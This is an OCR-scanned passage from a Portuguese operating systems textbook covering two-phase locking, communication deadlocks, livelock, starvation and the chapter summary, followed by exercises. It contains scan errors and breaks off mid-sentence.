Quando múltiplos processos estão executando ao mes- 
mo tempo, há um perigo real de impasse. 

A abordagem muitas vezes usada é chamada de tra- 
vamento em duas fases (two-phase locking). Na pri- 
meira fase, o processo tenta travar todos os registros de 
que precisa, um de cada vez. Se for bem-sucedido, ele 
começa a segunda fase, desempenhando as atualizações 
e liberando as travas. Nenhum trabalho de verdade é 
feito na primeira fase. 


Se, durante a primeira fase, algum registro for ne- 
cessário que já esteja travado, o processo simplesmente 
libera todas as travas e começa a primeira fase desde 
o início. De certa maneira, essa abordagem é similar a 
solicitar todos os recursos necessários antecipadamente, 
ou pelo menos antes que qualquer ato irreversível seja 
feito. Em algumas versões do travamento em duas fases 
não há liberação e reinício se um registro travado for en- 
contrado durante a primeira fase. Nessas versões, pode 
ocorrer um impasse. 

No entanto, essa estratégia em geral não é aplicável. 
Em sistemas de tempo real e sistemas de controle de 
processos, por exemplo, não é aceitável apenas terminar 
um processo no meio do caminho porque um recurso 
não está disponível e começar tudo de novo. Tampouco 
é aceitável reiniciar se o processo já leu ou escreveu 
mensagens para a rede, arquivos atualizados ou qual- 
quer coisa que não possa ser repetida seguramente. O 
algoritmo funciona apenas naquelas situações em que 
o programador arranjou as coisas muito cuidadosamente 
de modo que o programa pode ser parado em qualquer 
ponto durante a primeira fase e reiniciado. Muitas apli- 
cações não podem ser estruturadas dessa maneira. 


6.7.2 Impasses de comunicação 


Todo o nosso trabalho até o momento concentrou- 
-se nos impasses de recursos. Um processo quer algo 
que outro processo tem e deve esperar até que o pri- 
meiro abra mão dele. Às vezes os recursos são objetos 
de hardware ou software, como unidades de Blu-ray 
ou registros de bancos de dados, mas às vezes eles são 
mais abstratos. O impasse de recursos é um problema 
de sincronização de competição. Processos indepen- 
dentes completariam seus serviços se a sua execução 
não sofresse a competição de outros processos. Um 
processo trava recursos a fim de evitar estados de re- 
cursos inconsistentes causados pelo acesso intercalado 
a recursos. O acesso intervalado a recursos bloquea- 
dos, no entanto, proporciona o impasse de recursos. Na 
Figura 6.2 vimos um impasse de recursos em que eles 
eram semáforos. Um semáforo é um pouco mais abstrato 
do que uma unidade de Blu-ray, mas nesse exemplo cada 
processo adquiriu de maneira bem-sucedida um recurso 
(um dos semáforos) e entraram em situação em impasse 
ao tentar adquirir outro (o outro semáforo). Essa situação 
é um clássico impasse de recursos. 

No entanto, como mencionamos no início do capítu- 
lo, embora impasses de recursos sejam o tipo mais co- 
mum, eles não são o único. Outro tipo de impasse pode 
ocorrer em sistemas de comunicação (por exemplo, 
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redes), em que dois ou mais processos comunicam-se 
enviando mensagens. Um arranjo comum é o processo 
A enviar uma mensagem de solicitação ao processo B, 
e então bloquear até B enviar de volta uma mensagem 
de resposta. Suponha que a mensagem de solicitação se 
perca. 4 está bloqueado esperando pela resposta. B está 
bloqueado esperando por uma solicitação pedindo a ele 
para fazer algo. Temos um impasse. 

Este, no entanto, não é o impasse de recursos 
clássico. 4 não possui nenhum recurso que B quer, 
e vice-versa. Na realidade, não há recurso algum à 
vista. Mas trata-se de um impasse de acordo com 
nossa definição formal, pois temos um conjunto de 
(dois) processos, cada um bloqueado esperando por 
um evento que somente o outro pode causar. Essa si- 
tuação é chamada de impasse de comunicação para 
contrastá-la com o impasse de recursos mais comum. 
O impasse de comunicação é uma anomalia de sin- 
cronização de cooperação. Os processos nesse tipo 
de impasse não poderiam completar o serviço se exe- 
cutados independentemente. 

Impasses de comunicação não podem ser preveni- 
dos ordenando os recursos (dado que não há recursos) 
ou evitados mediante um escalonamento cuidadoso 
(já que não há momentos em que uma solicitação po- 
deria ser adiada). Felizmente, existe outra técnica que 
pode ser empregada para acabar com os impasses de 
comunicação: controles de limite de tempo (timeouts). 
Na maioria dos sistemas de comunicação, sempre que 
uma mensagem é enviada para a qual uma resposta é 
esperada, um temporizador é inicializado. Se o limite 
de tempo for ultrapassado antes de a resposta chegar, 
o emissor da mensagem presume que ela foi perdida e 
a envia de novo (e quantas vezes for necessário). Des- 
sa maneira, o impasse é rompido. Colocando a questão 
de outra maneira, o limite de tempo serve como uma 
heurística para detectar impasses e possibilitar a recupe- 
ração, e é aplicável também a impasses de recurso. Da 
mesma maneira, usuários com drivers de dispositivos 
temperamentais ou defeituosos que geram impasses ou 
“congelamentos” contam com elas para resolver essas 
questões. 

É claro, se a mensagem original não foi perdida, mas 
a resposta apenas foi atrasada, o destinatário pode re- 
ceber a mensagem duas vezes ou mais, possivelmente 
com consequências indesejáveis. Pense em um sistema 
bancário eletrônico no qual a mensagem contém instru- 
ções para realizar um pagamento. É claro, isso não deve 
ser repetido (e executado) múltiplas vezes só porque 
a rede é lenta ou o timeout curto demais. Projetar as 
regras de comunicação, chamadas de protocolo, para 
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deixar tudo certo é um assunto complexo, mas fora do 
escopo deste livro. Leitores interessados em protocolos 
de rede poderiam interessar-se por outro livro de um 
dos autores, Redes de computadores (TANENBAUM e 
WETHERALL, 2010). 

Nem todos os impasses que ocorrem em sistemas 
de comunicação ou redes são impasses de comunica- 
ção. Impasses de recursos também acontecem. Consi- 
dere, por exemplo, a rede da Figura 6.15. Trata-se de 
uma visão simplificada da internet. Muito simplifica- 
da. A internet consiste em dois tipos de computadores: 
hospedeiros e roteadores. Um hospedeiro (host) é um 
computador de usuário, seja o tablet ou o PC na casa 
de alguém, um PC em uma empresa ou um servidor 
corporativo. Hospedeiros trabalham para pessoas. Um 
roteador é um computador de comunicações espe- 
cializado que move pacotes de dados da fonte para o 
destino. Cada hospedeiro é conectado a um ou mais 
roteadores, seja por linha DSL, conexão de TV a cabo, 
LAN, conexão dial-up, rede sem fio, fibra ótica ou 
algo mais. 

Quando um pacote chega a um roteador vindo de 
um dos seus hospedeiros, ele é colocado em um buffer 
para transmissão subsequente para outro roteador e en- 
tão outro até que chegue ao destino. Esses buffers são 
recursos e há um número finito deles. Na Figura 6.16 
cada roteador tem apenas oito buffers (na prática eles 
têm milhões, mas isso não muda a natureza do impasse 
potencial, apenas sua frequência). Suponha que todos 
os pacotes no roteador 4 precisam ir para B, todos os 
pacotes em B precisam ir para C, todos os pacotes em 
C precisam ir para D e todos os pacotes em D precisam 
ir para 4. Nenhum pacote pode se movimentar porque 
não há um buffer na outra extremidade e temos um 
clássico impasse de recursos, embora no meio de um 
sistema de comunicação. 


|FIGURA 6.15] Um impasse de recursos em uma rede. 
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KeA Processos educados que podem causar um livelock. 


void process. A(void) { 
acquire lock(&resource. 1); 
while (try lock(&resource 2) == FAIL) { 
release lock(&resource. 1); 
wait. fixed time(); 
acquire lock(&resource. 1); 


} 


use_both_resources( ); 
release lock(&resource 2); 
release lock(&resource. 1); 


} 


void process. A(void) { 
acquire lock(&resource 2); 
while (try lock(&resource 1) == FAIL) { 
release lock(&resource. 2); 
wait. fixed. time(); 
acquire_lock(&resource_2); 


use_both_resources( ); 
release_lock(&resource_1); 
release lock(&resource 2); 


6.7.3 Livelock 


Em algumas situações, um processo tenta ser educa- 
do abrindo mão dos bloqueios que ele já adquiriu sem- 
pre que nota que não pode obter o bloqueio seguinte de 
que precisa. Então ele espera um milissegundo, diga- 
mos, e tenta de novo. Em princípio, isso é bom e deve 
ajudar a detectar e a evitar impasses. No entanto, se o 
outro processo faz a mesma coisa exatamente no mes- 
mo momento, eles estarão na situação de duas pessoas 
tentando passar uma pela outra quando ambas educada- 
mente dão um passo para o lado e, no entanto, nenhum 
progresso é possível, pois elas seguem dando um passo 
ao lado na mesma direção ao mesmo tempo. 

Considere um primitivo atômico try lock no qual o 
processo chamador testa um mutex e o pega ou retor- 
na uma falha. Em outras palavras, ele jamais bloqueia. 
Programadores podem usá-lo junto com acquire lock 
que também tenta pegar a trava (lock), mas bloqueia 
se ela não estiver disponível. Agora imagine um par de 
processos executando em paralelo (talvez em núcleos 
diferentes) que usam dois recursos, como mostrado na 
Figura 6.16. Cada um precisa de dois recursos e usa o 
primitivo try lock para tentar adquirir as travas neces- 
sárias. Se a tentativa falha, o processo abre mão da tra- 
va que ele possui e tenta novamente. Na Figura 6.16, 
o processo 4 executa e adquire o recurso 1, enquanto o 


processo 2 executa e adquire o recurso 2. Em seguida, 
eles tentam adquirir a outra trava e falham. Para serem 
educados, eles abrem mão da trava que possuem atual- 
mente e tentam de novo. Essa rotina se repete até que 
um usuário entediado (ou alguma outra entidade) acaba 
com o sofrimento de um desses processos. É claro, ne- 
nhum processo é bloqueado e poderíamos até dizer que 
as coisas estão acontecendo, então isso não é um im- 
passe. Ainda assim, nenhum progresso é possível, então 
temos algo equivalente: um livelock.? 

Livelocks e impasses podem ocorrer de maneiras 
surpreendentes. Em alguns sistemas, o número total de 
processos permitidos é determinado pelo número de 
entradas na tabela de processos. Desse modo, vagas na 
tabela de processo são recursos finitos. Se um fork fa- 
lha porque a tabela está cheia, uma abordagem razoável 
para o programa realizando o fork é esperar um tempo 
qualquer e tentar novamente. 

Agora suponha que um sistema UNIX tem cem en- 
tradas para processos. Dez programas estão executando, 
cada um deles precisa criar 12 filhos. Após cada um ter 
criado 9 processos, os 10 processos originais e os 90 
novos exauriram a tabela. Cada um dos 10 processos 
originais encontra-se agora em um laço sem fim reali- 
zando fork e falhando — um livelock. A probabilidade 
de isso acontecer é minúscula, mas poderia acontecer. 
Deveriamos abandonar os processos e a chamada fork 
para eliminar o problema? 

O número máximo de arquivos abertos é similar- 
mente restrito pelo tamanho da tabela de i-nós, assim 
um problema similar ocorre quando ela enche. O es- 
paço de swap no disco é outro recurso limitado. Na 
realidade, quase todas as tabelas no sistema operacio- 
nal representam um recurso finito. Deveriamos abolir 
todas elas porque poderia acontecer de uma coleção 
de n processos reivindicar 1/n do total, e então cada 
um tentar reivindicar outro? Provavelmente não é uma 
boa ideia. 

A maioria dos sistemas operacionais, incluindo UNIX 
e Windows, na essência apenas ignora o problema presu- 
mindo que a maioria dos usuários preferiria um livelock 
ocasional (ou mesmo um impasse) a uma regra restringin- 
do todos os usuários a um processo, um arquivo aberto e 
um de tudo. Se esses problemas pudessem ser eliminados 
gratuitamente, não haveria muita discussão. A questão é 
que o preço é alto, principalmente por causa da aplicação 
de restrições inconvenientes sobre os processos. Desse 
modo, estamos diante de uma escolha desagradável entre 
conveniência e correção, e muita discussão sobre o que é 
mais importante, e para quem. 





2 Lembrando que um “impasse” é um “deadlock”. (N. T). 
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6.7.4 Inanição 


Um problema relacionado de muito perto com o 
impasse e o livelock é a inanição (starvation). Em um 
sistema dinâmico, solicitações para recursos acontecem 
o tempo todo. Alguma política é necessária para tomar 
uma decisão sobre quem recebe qual recurso e quando. 
Essa política, embora aparentemente razoável, pode le- 
var a alguns processos nunca serem servidos, embora 
não estejam em situação de impasse. 

Como exemplo, considere a alocação da impressora. 
Imagine que o sistema utilize algum algoritmo para as- 
segurar que a alocação da impressora não leve a um im- 
passe. Agora suponha que vários processos a queiram ao 
mesmo tempo. Quem deve ficar com ela? 

Um algoritmo de alocação possível é dá-la ao pro- 
cesso com o menor arquivo para imprimir (presumindo 
que essa informação esteja disponível). Essa aborda- 
gem maximiza o número de clientes felizes e parece 
justa. Agora considere o que acontece em um sistema 
ocupado quando um processo tem um arquivo enorme 
para imprimir. Toda vez que a impressora estiver livre, 
o sistema procurará à sua volta e escolherá o processo 
com o arquivo mais curto. Se houver um fluxo constan- 
te de processos com arquivos curtos, o processo com o 
arquivo enorme jamais terá a impressora alocada para 
si. Ele simplesmente morrerá de inanição (será poster- 
gado indefinidamente, embora não esteja bloqueado). 

A inanição pode ser evitada com uma política de 
alocação de recursos primeiro a chegar, primeiro a ser 
servido. Com essa abordagem, o processo que estiver 
esperando há mais tempo é servido em seguida. No de- 
vido momento, qualquer dado processo será consequen- 
temente o mais antigo e, desse modo, receberá o recurso 
de que necessita. 

Vale a pena mencionar que algumas pessoas não 
fazem distinção entre a inanição e o impasse, porque 
em ambos os casos não há um progresso. Outros creem 
tratar-se de conceitos fundamentalmente diferentes, 
pois um processo poderia com facilidade ser progra- 
mado a tentar fazer algo n vezes e, se todas elas fa- 
lhassem, tentar algo mais. Um processo bloqueado não 
tem essa escolha. 


6.8 Pesquisas sobre impasses 


Se há um assunto que foi pesquisado extensamente 
no princípio dos sistemas operacionais, foi o impasse. 
A razão é que a detecção de impasses é um problema 
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de teoria de grafos interessante sobre o qual um estu- 
dante universitário inclinado à matemática poderia se 
debruçar por quatro anos. Muitos algoritmos foram de- 
senvolvidos, cada um mais exótico e menos prático do 
que o anterior. A maior parte desses trabalhos caiu no 
esquecimento, mas mesmo assim, alguns estudos ainda 
estão sendo publicados sobre impasses. 

Trabalhos recentes sobre impasses incluem a pes- 
quisa sobre a imunidade a impasses (JULA et al., 
2011). A principal ideia dessa abordagem é que as 
aplicações detectam impasses quando eles ocorrem e 
então salvam suas “assinaturas”, de maneira a evitar o 
mesmo impasse em execuções futuras. Marino et al. 
(2013), por outro lado, usam o controle de concorrên- 
cia para certificar-se de que os impasses não possam 
ocorrer em primeiro lugar. 

Outra direção de pesquisa é tentar e detectar impas- 
ses. Trabalhos recentes sobre a detecção de impasses 
foram apresentados por Pyla e Varadarajan (2012). 
O trabalho de Cai e Chan (2012) apresenta um novo 
esquema de detecção de impasses dinâmico que itera- 
tivamente apara dependências entre travas que não têm 
arestas de entrada ou saída. 


6.9 Resumo 


O impasse é um problema potencial em qualquer sis- 
tema operacional. Ele ocorre quando todos os membros 
de um conjunto de processos são bloqueados esperando 
por um evento que apenas outros membros do mesmo 
conjunto podem causar. Essa situação faz que todos os 
processos esperem para sempre. Comumente, o evento 
pelo qual os processos estão esperando é a liberação de 
algum recurso nas mãos de outro membro do conjunto. 
Outra situação na qual o impasse é possível ocorre quan- 
do todos os processos de um conjunto de processos de co- 
municação estão esperando por uma mensagem e o canal 
de comunicação está vazio e não há timeouts pendentes. 

O impasse de recursos pode ser evitado controlan- 
do quais estados são seguros e quais são inseguros. Um 
estado seguro é aquele no qual existe uma sequência de 
eventos garantindo que todos os processos possam ser 
concluídos. Um estado inseguro não tem essa garantia. 
O algoritmo do banqueiro evita o impasse ao não con- 
ceder uma solicitação se ela colocar o sistema em um 
estado inseguro. 


O problema do impasse aparece por toda parte. Wu 
et al. (2013) descrevem um sistema de controle de im- 
passes para sistemas de manufatura automatizados. 
Ele modela esses sistemas usando redes de Petri para 
procurar por condições necessárias e suficientes a fim 
de permitir um controle de impasses permissivo. 

Há também muita pesquisa sobre a detecção dis- 
tribuída de impasses, especialmente em computação 
de alto desempenho. Por exemplo, há um conjunto de 
trabalhos significativo sobre a detecção de impasses 
baseada no escalonamento. Wang e Lu (2013) apresen- 
tam um algoritmo de escalonamento para cálculos de 
fluxo de trabalho na presença de restrições de armaze- 
namento. Hilbrich et al. (2013) descrevem a detecção 
de impasses em tempo de execução para MPI. Por fim, 
há uma quantidade enorme de trabalhos teóricos sobre 
a detecção de impasses distribuídos. No entanto, não a 
consideraremos aqui, pois (1) está fora do escopo deste 
livro e (2) nada disso chega a ser remotamente práti- 
co em sistemas reais. A sua principal função parece ser 
manter fora das ruas teóricos de grafos que de outra ma- 
neira estariam desempregados. 


O impasse de recursos pode ser evitado estrutu- 
ralmente projetando o sistema de tal maneira que ele 
jamais possa ocorrer. Por exemplo, ao permitir que 
um processo possua somente um recurso a qualquer 
instante, a condição da espera circular necessária 
para um impasse é derrubada. O impasse de recursos 
também pode ser evitado numerando todos os recur- 
sos e obrigando os processos a requisitá-los somente 
na ordem crescente. 

O impasse de recursos não é o único tipo existente. 
O impasse de comunicação também é um problema em 
potencial em alguns sistemas, embora ele possa mui- 
tas vezes ser resolvido via estabelecimento de timeouts 
apropriados. 

O livelock é similar ao impasse no sentido de que 
ele pode parar todo o progresso, mas ele é tecnica- 
mente diferente, pois envolve processos que não es- 
tão realmente bloqueados. A inanição pode ser evitada 
mediante uma política de alocação “primeiro a chegar, 
primeiro a ser servido”. 


PROBLEMAS 


Dê um exemplo de um impasse tirado da política. 
Estudantes trabalhando em PCs individuais em um la- 
boratório de computadores enviam seus arquivos para 
serem impressos por um servidor que envia os arquivos 
para o seu disco rígido através de spooling. Em quais 
condições pode ocorrer um impasse se o espaço em dis- 
co para o spool de impressão é limitado? Como o impas- 
se pode ser evitado? 

Na questão anterior, quais recursos podem ser obtidos 
por preempção e quais não podem ser obtidos dessa 
maneira? 

Na Figura 6.1 os recursos são retornados na ordem in- 
versa da sua aquisição. Devolvê-los na outra ordem seria 
igualmente correto? 

As quatro condições (exclusão mútua, posse e espera, 
não preempção e espera circular) são necessárias para 
que o impasse de um recurso ocorra. Dê um exemplo 
mostrando que essas condições não são suficientes para 
que ocorra um impasse de um recurso. Quando tais con- 
dições são suficientes para que ocorra esse impasse? 

As ruas da cidade são vulneráveis a uma condição de 
bloqueio circular chamada engarrafamento, na qual os 
cruzamentos são bloqueados pelos carros que então 
bloqueiam os carros atrás deles que então bloqueiam os 
carros que estão tentando entrar no cruzamento anterior 
etc. Todos os cruzamentos em torno de um quarteirão da 
cidade estão cheios de veículos que bloqueiam o tráfego 
que está chegando de uma maneira circular. O engarra- 
famento é um impasse de recursos e um problema de 
sincronização da competição. O algoritmo de prevenção 
da cidade de Nova York, chamado “não bloqueie o es- 
paço”, proíbe os carros de entrar em um cruzamento a 
não ser que o espaço após o cruzamento esteja também 
disponível. Qual algoritmo de prevenção é esse? Você 
teria em mente algum outro algoritmo de prevenção para 
engarrafamentos? 

Suponha que quatro carros se aproximem de um cru- 
zamento vindos de quatro direções diferentes simulta- 
neamente. Cada esquina da interseção tem um sinal de 
“pare”. Presuma que as normas do trânsito exijam que, 
quando dois carros se aproximam adjacentes a sinais de 
“pare” ao mesmo tempo, o carro à esquerda deve ceder 
para o carro à direita. Desse modo, quando quatro carros 
avançam até seus sinais de “pare” individuais, cada um 
espera (indefinidamente) pelo carro da esquerda seguir. 
Essa anomalia é um impasse de comunicação? É um im- 
passe de recursos? 

É possível que um impasse de recurso envolva múltiplas 
unidades de um tipo e uma única unidade de outro? Se 
afirmativo, dê um exemplo. 


10. 


11. 


12. 


13. 


14. 





15. 
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A Figura 6.3 mostra o conceito de um grafo de recursos. 
Existem grafos ilegais, isto é, grafos que violam estru- 
turalmente o modelo que usamos para a utilização de 
recursos? Se afirmativo, dê um exemplo de um. 
Considere a Figura 6.4. Suponha que no passo (0) C soli- 
citou S em vez de R. Isso levaria a um impasse? Suponha 
que ele tenha solicitado tanto S como R. 

Suponha que há um impasse de recursos em um sistema. 
Dê um exemplo para mostrar que o conjunto de proces- 
sos em situação de impasse pode incluir processos que 
não estão na cadeia circular no grafo de alocação de re- 
cursos correspondente. 

A fim de controlar o tráfego, um roteador de rede, 4, en- 
via periodicamente uma mensagem para seu vizinho, B, 
dizendo-lhe para aumentar ou reduzir o número de pa- 
cotes com que ele pode lidar. Em determinado ponto no 
tempo, o Roteador 4 é inundado com tráfego e envia a B 
uma mensagem dizendo-lhe para cessar de enviar tráfe- 
go. Ele faz isso especificando que o número de bytes que 
B pode enviar (tamanho da janela de A) é 0. À medida 
que os surtos de tráfego diminuem, 4 envia uma nova 
mensagem, dizendo a B para reiniciar a transmissão. 
Ele faz isso aumentando o tamanho da janela de O para 
um número positivo. Essa mensagem é perdida. Como 
descrito, nenhum lado jamais transmitirá. Que tipo de 
impasse é esse? 

A discussão do algoritmo do avestruz menciona a pos- 
sibilidade de entradas da tabela de processos ou outras 
tabelas do sistema encherem. Você poderia sugerir uma 
maneira de capacitar um administrador de sistemas a re- 
cuperar de uma situação dessas? 


Considere o estado a seguir de um sistema com quatro 
processos, P17, P2, P3 e P4, e cinco tipos de recursos, 
RSI, RS2, RS3, RS4 e RSS. 


E = (24144) 


A = (01021) 


Usando o algoritmo de detecção de impasses descrito na 
Seção 6.4.2, mostre que há um impasse no sistema. Iden- 
tifique os processos que estão em situação de impasse. 


Explique como o sistema pode se recuperar do impasse 
no problema anterior usando 


(a) recuperação mediante preempção. 
(b) recuperação mediante retrocesso. 
(c) recuperação mediante eliminação de processos. 


E) | SISTEMAS OPERACIONAIS MODERNOS 


16. 


17. 


18. 


19. 


20. 


21. 


22. 


23. 


24. 


25. 


26. 


27. 


Suponha que na Figura 6.6 C, + R; > E, para algum i. 
Quais implicações isso tem para o sistema? 

Todas as trajetórias na Figura 6.8 são horizontais ou ver- 
ticais. Você consegue imaginar alguma circunstância na 
qual trajetórias diagonais também sejam possíveis? 

O esquema de trajetória de recursos da Figura 6.8 
também poderia ser usado para ilustrar o problema de 
impasses com três processos e três recursos? Se afirma- 
tivo, como isso pode ser feito? Se não for possível, por 
que não? 

Na teoria, grafos da trajetória de recursos poderiam ser 
usados para evitar impasses. Com um escalonamento in- 
teligente, o sistema operacional poderia evitar regiões 
inseguras. Existe uma maneira prática de realmente se 
fazer isso? 

É possível que um sistema esteja em um estado que não 
seja de impasse nem tampouco seguro? Se afirmativo, 
dê um exemplo. Se não, prove que todos os estados são 
seguros ou se encontram em situação de impasse. 
Examine cuidadosamente a Figura 6.11(b). Se D pedir 
por mais uma unidade, isso leva a um estado seguro ou 
inseguro? E se a solicitação vier de C em vez de D? 
Um sistema tem dois processos e três recursos idênticos. 
Cada processo precisa de um máximo de dois recursos. 
Um impasse é possível? Explique a sua resposta. 
Considere o problema anterior novamente, mas agora 
com p processos cada um necessitando de um máximo 
de m recursos e um total de r recursos disponíveis. Qual 
condição deve se manter para tornar o sistema livre de 
impasses? 

Suponha que o processo 4 na Figura 6.12 exige a última 
unidade de fita. Essa ação leva a um impasse? 

O algoritmo do banqueiro está sendo executado em um 
sistema com m classes de recursos e n processos. No limi- 
te de m e n grandes, o número de operações que precisam 
ser realizadas para verificar a segurança de um estado é 
proporcional a mn’. Quais são os valores de a e b? 

Um sistema tem quatro processos e cinco recursos alo- 
cáveis. A alocação atual e as necessidades máximas são 
as seguintes: 


Alocado Máximo Disponível 
Processo A 10211 11213 00x11 
Processo B 20110 22210 
Processo C 11010 21310 
Processo D 11110 11221 


Qual é o menor valor de x para o qual esse é um estado 
seguro? 

Uma maneira de se eliminar a espera circular é ter uma 
regra dizendo que um processo tem direito a somente 
um único recurso a qualquer dado momento. Dê um 


28. 


29. 
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exemplo para mostrar que essa restrição é inaceitável 
em muitos casos. 

Dois processos, 4 e B, têm cada um três registros, 1, 2 e 
3, em um banco de dados. Se 4 pede por eles na ordem 
1,2,3 e B pede por eles na mesma ordem, o impasse não 
é possível. No entanto, se B pedir por eles na ordem 3, 2, 
1, então o impasse é possível. Com três recursos, há 3! 
ou seis combinações possíveis nas quais cada processo 
pode solicitá-los. Qual fração de todas as combinações é 
garantida que seja livre de impasses? 

Um sistema distribuído usando caixas de correio tem 
duas primitivas de IPC, send e receive. A segunda pri- 
mitiva especifica um processo do qual deve receber e 
bloqueia se nenhuma mensagem desse processo estiver 
disponível, embora possa haver mensagens esperando 
de outros processos. Não há recursos compartilhados, 
mas os processos precisam comunicar-se frequentemen- 
te a respeito de outras questões. É possível ocorrer um 
impasse? Discuta. 

Em um sistema de transferência de fundos eletrônico, há 
centenas de processos idênticos que funcionam como a 
seguir. Cada processo lê uma linha de entrada especifi- 
cando uma quantidade de dinheiro, a conta a ser credita- 
da e a conta a ser debitada. Então ele bloqueia ambas as 
contas e transfere o dinheiro, liberando as travas quando 
concluída a transferência. Com muitos processos exe- 
cutando em paralelo, há um perigo muito real de que 
um processo tendo bloqueado a conta x será incapaz de 
desbloquear y porque y foi bloqueada por um processo 
agora esperando por x. Projete um esquema que evite os 
impasses. Não libere um registro de conta até você ter 
completado as transações. (Em outras palavras, soluções 
que bloqueiam uma conta e então a liberam imediata- 
mente se a outra estiver bloqueada não são permitidas.) 
Uma maneira de evitar os impasses é eliminar a condi- 
ção de posse e espera. No texto, foi proposto que antes de 
pedir por um novo recurso, um processo deve primeiro 
liberar quaisquer recursos que ele já possui (presumin- 
do que isso seja possível). No entanto, fazê-lo introduz 
o perigo de que ele possa receber o novo recurso, mas 
perder alguns dos recursos existentes para processos que 
estão competindo com ele. Proponha uma melhoria para 
esse esquema. 

Um estudante de ciência da computação designado para 
trabalhar com impasses pensa na seguinte maneira bri- 
lhante de eliminar os impasses. Quando um processo 
solicita um recurso, ele especifica um limite de tempo. 
Se o processo bloqueia porque o recurso não está dis- 
ponível, um temporizador é inicializado. Se o limite de 
tempo for excedido, o processo é liberado e pode execu- 
tar novamente. Se você fosse o professor, qual nota daria 
a essa proposta e por quê? 
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Unidades de memória principal passam por preempção 
em sistema de memória virtual e swapping. O proces- 
sador passa por preempção em ambientes de tempo 
compartilhado. Você acredita que esses métodos de pre- 
empção foram desenvolvidos para lidar com o impas- 
se de recursos ou para outros fins? Quão alta é a sua 
sobrecarga? 

Explique a diferença entre impasse, livelock e inanição. 
Presuma que dois processos estejam emitindo um co- 
mando de busca para reposicionar o mecanismo de aces- 
so ao disco e possibilitar um comando de leitura. Cada 
processo é interrompido antes de executar a sua leitura, 
e descobre que o outro moveu o braço do disco. Cada 
um então reemite o comando de busca, mas é de novo 
interrompido pelo outro. Essa sequência se repete con- 
tinuamente. Isso é um impasse ou um livelock de recur- 
sos? Quais métodos você recomendaria para lidar com a 
anomalia? 

Redes de área local utilizam um método de acesso à 
mídia chamado CSMA/CD, no qual as estações com- 
partilhando um barramento podem conferir o meio e de- 
tectar transmissões, assim como colisões. No protocolo 
Ethernet, as estações solicitando o canal compartilhado 
não transmitem quadros se perceberem que o meio está 
ocupado. Quando uma transmissão é concluída, as es- 
tações esperando transmitem seus quadros. Dois qua- 
dros que forem transmitidos ao mesmo tempo colidirão. 
Se as estações imediata e repetidamente retransmitem 
após a detecção da colisão, elas continuarão a colidir 
indefinidamente. 

(a) Estamos falando de um impasse ou um livelock de 
recursos? 

(b) Você poderia sugerir uma solução para essa 
anomalia? 

(e) 
Um programa contém um erro na ordem de mecanis- 
mos de cooperação e competição, resultando em um 
processo consumidor bloqueando um mutex (semáforo 
de exclusão mútua) antes que ele bloqueie um buffer 
vazio. O processo produtor bloqueia no mutex antes que 
ele possa colocar um valor no buffer vazio e despertar 
o consumidor. Desse modo, ambos os processos estão 
bloqueados para sempre, o produtor esperando que o 
mutex seja desbloqueado e o consumidor esperando por 
um sinal do produtor. Estamos falando de um impas- 
se de recursos ou um impasse de comunicação? Sugira 
métodos para o seu controle. 


A inanição poderia ocorrer nesse cenário? 


Cinderela e o Príncipe estão se divorciando. Para divi- 
dir sua propriedade, eles concordaram com o algoritmo 
a seguir. Cada manhã, um deles pode enviar uma carta 
para o advogado do outro exigindo um item da proprie- 
dade. Como leva um dia para as cartas serem entregues, 
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eles concordaram que se ambos descobrirem que eles 
solicitaram o mesmo item no mesmo dia, no dia seguin- 
te eles mandarão uma carta cancelando o pedido. Entre 
seus bens há o seu cão, Woofer. A casa de cachorro do 
Woofer, seu canário, Tweeter, e a gaiola dele. Os animais 
adoram suas casas, então foi acordado que qualquer di- 
visão de propriedade separando um animal da sua casa é 
inválida, exigindo que toda a divisão começasse do iní- 
cio. Tanto Cinderela quanto Príncipe querem desesperada- 
mente ficar com Woofer. Para que pudessem sair de férias 
(separados), cada um programou um computador pessoal 
para lidar com a negociação. Quando voltaram das férias, 
os computadores ainda estavam negociando. Por quê? Um 
impasse é possível? Inanição? Discuta sua resposta. 

Um estudante especializando-se em antropologia e in- 
teressado em ciência de computação embarcou em um 
projeto de pesquisa para ver se os babuínos africanos 
podem ser ensinados a respeito de impasses. Ele localiza 
um cânion profundo e amarra uma corda de um lado ao 
outro, de maneira que os babuínos podem atravessá-lo 
agarrando-se com as mãos. Vários babuínos podem atra- 
vessar ao mesmo tempo, desde que eles todos sigam na 
mesma direção. Se babuinos seguindo na direção leste e 
outros seguindo na direção oeste se encontrarem na cor- 
da ao mesmo tempo, ocorrerá um impasse (eles ficarão 
presos no meio do caminho), pois é impossível que um 
passe sobre o outro. Se um babuino quiser atravessar o 
cânion, ele tem de conferir para ver se não há nenhum 
outro babuino cruzando o cânion no momento na dire- 
ção oposta. Escreva um programa usando semáforos 
que evite o impasse. Não se preocupe com uma série 
de babuínos movendo-se na direção leste impedindo in- 
definidamente a passagem de babuínos movendo-se na 
direção oeste. 

Repita o problema anterior, mas agora evite a inanição. 
Quando um babuino que quiser atravessar para leste 
chegar à corda e encontrar babuinos cruzando na direção 
contrária, ele espera até que a corda esteja vazia, mas 
nenhum outro babuíno deslocando-se para oeste tem 
permissão de começar a travessia até que pelo menos 
um babuino tenha atravessado na outra direção. 
Programe uma simulação do algoritmo do banqueiro. 
O programa deve passar por cada um dos clientes do 
banco fazendo uma solicitação e avaliando se ela é se- 
gura ou insegura. Envie um histórico de solicitações e 
decisões para um arquivo. 

Escreva um programa para implementar o algoritmo de 
detecção de impasses com múltiplos recursos de cada 
tipo. O seu programa deve ler de um arquivo as seguintes 
entradas: o número de processos, o número de tipos de 
recursos, o número de recursos de cada tipo em existên- 
cia (vetor E), a matriz de alocação atual C (primeira fila, 
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seguida pela segunda fila e assim por diante), a matriz de 
solicitações R (primeira fila, seguida pela segunda fila, e 
assim por diante). A saída do seu programa deve indicar 
se há um impasse no sistema. Caso exista, o programa 
deve imprimir as identidades de todos os processos que 
estão em situação de impasse. 

Escreva um programa que detecte se há um impasse no 
sistema usando um grafo de alocação de recursos. O seu 
programa deve ler de um arquivo as seguintes entradas: 
o número de processos e o número de recursos. Para 
cada processo ele deve ler quatro números: o número de 
recursos que tem em mãos no momento, as identidades 
dos recursos que tem em mãos, o número de recursos 
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que ele está solicitando atualmente e as identidades dos 
recursos que está solicitando. A saída do programa deve 
indicar se há um impasse no sistema. Caso exista, o pro- 
grama deve imprimir as identidades de todos os proces- 
sos em situação de impasse. 

Em determinados países, quando duas pessoas se en- 
contram, elas inclinam-se para a frente como forma 
de cumprimento. O protocolo manda que uma delas se 
incline para a frente primeiro e permaneça inclinada 
até que a outra a cumprimente da mesma forma. Se 
